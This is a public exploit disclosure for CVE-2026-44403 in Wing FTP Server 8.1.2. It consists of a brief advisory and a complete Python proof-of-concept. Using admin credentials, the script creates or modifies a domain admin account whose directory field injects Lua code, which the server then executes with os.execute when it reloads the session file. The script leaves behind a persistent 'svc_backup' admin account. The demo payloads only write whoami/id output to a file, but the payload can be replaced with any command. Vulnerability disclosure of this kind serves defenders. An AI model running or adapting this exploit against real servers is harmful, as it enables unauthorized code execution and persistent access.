# Exploit Title: Wing FTP Server 8.1.3 - Authenticated Remote Code Execution 
# Date: 12.05.2026
# Exploit Author: Ünsal Furkan Harani
# Vendor Homepage:
[https://www.wftpserver.com/](https://www.wftpserver.com/download.htm)
# Software Link:
https://www.wftpserver.com/download.htm
# Version: v8.1.2
# Tested on: Wing FTP Server <= 8.1.2, fixed in 8.1.3
# CVE : CVE-2026-44403

Wing FTP Server v8.1.2 contains a Remote Code Execution (RCE) vulnerability in the session serialization mechanism. An authenticated administrator can inject arbitrary Lua code through the domain admin `mydirectory` (basefolder) field, which gets executed server-side via `loadfile()`.

#!/usr/bin/env python3
"""
PREREQUISITES:
  - Valid full admin credentials (not readonly, not domain admin)
  - Target: Wing FTP Server web admin panel (default port 5466)

IMPACT:
  Remote Code Execution as the Wing FTP Server service account.
  Persistence: payload re-executes every time the poisoned session is loaded.
"""

import requests
import hashlib
import json
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class WingFTPSessionPoisoning:
    def __init__(self, target, admin_user, admin_pass, use_ssl=False):
        proto = "https" if use_ssl else "http"
        self.base_url = f"{proto}://{target}"
        self.admin_user = admin_user
        self.admin_pass = admin_pass
        self.session = requests.Session()
        self.session.verify = False

    def login(self):
        """Authenticate to the admin panel and obtain UIDADMIN session cookie."""
        # service_login.html accepts credentials via POST
        url = f"{self.base_url}/service_login.html"
        data = {
            "username": self.admin_user,
            "password": self.admin_pass,
        }
        headers = {
            "Referer": f"{self.base_url}/admin_login.html",
        }
        resp = self.session.post(url, data=data, headers=headers)
        try:
            result = resp.json()
            if result.get("code") == 0:
                print(f"[+] Login successful as '{self.admin_user}'")
                return True
            elif result.get("code") in (1, 2):
                print(f"[-] 2FA required — this PoC doesn't handle TOTP")
                return False
            else:
                print(f"[-] Login failed: {result}")
                return False
        except Exception:
            # Legacy endpoint (admin_loginok.html) returns HTML
            if "logged in ok" in resp.text or "main.html" in resp.text:
                print(f"[+] Login successful (legacy endpoint)")
                return True
            print(f"[-] Login failed: {resp.text[:200]}")
            return False

    def create_poisoned_admin(self, poison_admin_user, poison_admin_pass, lua_payload):
        """
        Create a domain admin with a poisoned 'mydirectory' (basefolder) field.

        The mydirectory value will be serialized as:
            _SESSION['admin_basefolder']=[[<mydirectory_value>]]

        Our payload breaks out of the [[ ]] long string:
            _SESSION['admin_basefolder']=[[/tmp/x]]<LUA_PAYLOAD>--]]

        When this session file is loaded via loadfile() + f(), the payload executes.
        """
        # Construct the poisoned basefolder value
        # Format: <innocent_prefix>]]<lua_code>--
        # The ]] closes the long string, code executes, -- comments out the rest
        poisoned_basefolder = f"/tmp/x]]{lua_payload}--"

        admin_obj = {
            "username": poison_admin_user,
            "password": poison_admin_pass,
            "readonly": False,
            "domainadmin": 1,        # Make it a domain admin
            "domainlist": "",         # Will be set by server
            "mydirectory": poisoned_basefolder,  # THIS IS THE PAYLOAD
            "ipmasks": [],
            "enable_two_factor": False,
            "two_factor_code": "",
        }

        url = f"{self.base_url}/service_add_admin.html"
        headers = {
            "Referer": f"{self.base_url}/main.html",
        }
        admin_json = json.dumps(admin_obj, separators=(',', ':'))

        print(f"[*] Creating poisoned domain admin '{poison_admin_user}'...")
        print(f"[*] Poisoned basefolder: {poisoned_basefolder}")
        # Use multipart/form-data — Wing FTP's Lua POST parser handles it more reliably
        resp = self.session.post(url, files={"admin": (None, admin_json)}, headers=headers)

        try:
            result = resp.json()
            if result.get("code") == 0:
                print(f"[+] Poisoned admin created successfully!")
                return True
            elif result.get("code") == -3:
                print(f"[!] Admin '{poison_admin_user}' already exists. Trying modify...")
                return self.modify_poisoned_admin(poison_admin_user, poison_admin_pass, lua_payload)
            else:
                print(f"[-] Failed to create admin: {result}")
                return False
        except Exception:
            print(f"[-] Unexpected response: {resp.text[:200]}")
            return False

    def modify_poisoned_admin(self, poison_admin_user, poison_admin_pass, lua_payload):
        """Modify existing admin to inject the poisoned basefolder."""
        poisoned_basefolder = f"/tmp/x]]{lua_payload}--"

        admin_obj = {
            "username": poison_admin_user,
            "password": poison_admin_pass,
            "readonly": False,
            "domainadmin": 1,
            "domainlist": "",
            "mydirectory": poisoned_basefolder,
            "ipmasks": [],
            "enable_two_factor": False,
            "two_factor_code": "",
        }

        # service_modify_admin.html has NO bracket stripping at all
        url = f"{self.base_url}/service_modify_admin.html"
        headers = {
            "Referer": f"{self.base_url}/main.html",
        }
        admin_json = json.dumps(admin_obj, separators=(',', ':'))

        resp = self.session.post(url, files={"admin": (None, admin_json), "oldname": (None, poison_admin_user)}, headers=headers)
        try:
            result = resp.json()
            if result.get("code") == 0:
                print(f"[+] Admin '{poison_admin_user}' modified with poisoned basefolder!")
                return True
            else:
                print(f"[-] Failed to modify admin: {result}")
                return False
        except Exception:
            print(f"[-] Unexpected response: {resp.text[:200]}")
            return False

    def trigger_payload(self, poison_admin_user, poison_admin_pass):
        """
        Trigger the payload by logging in as the poisoned domain admin.

        On login, service_login.html:95-96 stores the basefolder in session:
            rawset(_SESSION,"admin_basefolder",basefolder)
            rawset(_SESSION,"admin_nowpath",basefolder)

        SessionModule.save() serializes it as:
            _SESSION['admin_basefolder']=[[/tmp/x]]<PAYLOAD>--]]

        The payload executes on the NEXT session load (any subsequent request).
        """
        print(f"\n[*] Triggering payload by logging in as '{poison_admin_user}'...")

        trigger_session = requests.Session()
        trigger_session.verify = False

        url = f"{self.base_url}/service_login.html"
        data = {
            "username": poison_admin_user,
            "password": poison_admin_pass,
        }
        headers = {
            "Referer": f"{self.base_url}/admin_login.html",
        }

        # Step 1: Login — stores poisoned basefolder in session
        resp = trigger_session.post(url, data=data, headers=headers)
        print(f"[*] Login response: {resp.text[:200]}")

        # Step 2: Any subsequent request triggers loadfile() on the session file
        # The session file now contains the Lua payload
        trigger_url = f"{self.base_url}/service_get_dir_list.html"
        headers["Referer"] = f"{self.base_url}/main.html"
        resp2 = trigger_session.post(trigger_url, data={"dir": ""}, headers=headers)
        print(f"[*] Trigger response: {resp2.status_code}")
        print(f"[+] Payload should have executed on the server!")

        return True

def demo_session_file():
    """
    Demonstrate what the poisoned session file looks like.
    Shows the exact Lua code that gets written and executed.
    """
    print("=" * 70)
    print("DEMONSTRATION: Poisoned Session File Content")
    print("=" * 70)

    payload = 'os.execute("id > /tmp/wingftp_pwned.txt")'
    basefolder = f'/tmp/x]]{payload}--'

    print(f"\n[1] Admin sets mydirectory to:")
    print(f"    {basefolder}")

    print(f"\n[2] On login, session is saved. serialize() outputs:")
    session_content = f"""_SESSION['admin']=[[poisoned_admin]]
_SESSION['admin_basefolder']=[[{basefolder}]]
_SESSION['admin_domainadmin']=1
_SESSION['admin_domainlist']=[[]]
_SESSION['admin_nowpath']=[[{basefolder}]]
_SESSION['admin_readonly']=0
_SESSION['ipaddress']=[[127.0.0.1]]
_SESSION['logined']=[[true]]"""

    print(f"    --- session file content ---")
    for line in session_content.split('\n'):
        print(f"    {line}")
    print(f"    --- end ---")

    print(f"\n[3] Lua parser sees the basefolder line as:")
    print(f"    _SESSION['admin_basefolder']=[[/tmp/x]]  --> string '/tmp/x'")
    print(f"    {payload}                                 --> EXECUTED AS CODE!")
    print(f"    --]]                                      --> comment (ignored)")

    print(f"\n[4] Same for admin_nowpath line — payload executes TWICE.")

    print(f"\n[5] Result: '{payload}' runs as server process.")
    print("=" * 70)

def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <mode> [args...]")
        print(f"")
        print(f"Modes:")
        print(f"  demo                              — Show how the vulnerability works")
        print(f"  exploit <host:port> <user> <pass>  — Create poisoned admin and trigger RCE")
        print(f"")
        print(f"Examples:")
        print(f"  {sys.argv[0]} demo")
        print(f"  {sys.argv[0]} exploit 192.168.1.10:5466 admin password123")
        sys.exit(1)

    mode = sys.argv[1]

    if mode == "demo":
        demo_session_file()

    elif mode == "exploit":
        if len(sys.argv) < 5:
            print("Usage: exploit <host:port> <admin_user> <admin_pass>")
            sys.exit(1)

        target = sys.argv[2]
        admin_user = sys.argv[3]
        admin_pass = sys.argv[4]

        # Default payload — write proof file (Windows-compatible)
        lua_payload = 'os.execute("whoami > C:\\\\wingftp_pwned.txt")'

        poison_admin = "svc_backup"
        poison_pass = "P@ssw0rd123!"

        print(f"[*] Wing FTP Server Session Poisoning RCE — Chain 2")
        print(f"[*] Target: {target}")
        print(f"[*] Payload: {lua_payload}")
        print(f"[*] Poisoned admin account: {poison_admin}")
        print()

        exploit = WingFTPSessionPoisoning(target, admin_user, admin_pass)

        if not exploit.login():
            sys.exit(1)

        if not exploit.create_poisoned_admin(poison_admin, poison_pass, lua_payload):
            sys.exit(1)

        exploit.trigger_payload(poison_admin, poison_pass)

        print(f"\n[*] Check /tmp/wingftp_pwned.txt on target for proof of execution")
    else:
        print(f"Unknown mode: {mode}")
        sys.exit(1)

if __name__ == "__main__":
    main()

Sent with [Proton Mail](https://proton.me/mail/home) secure email.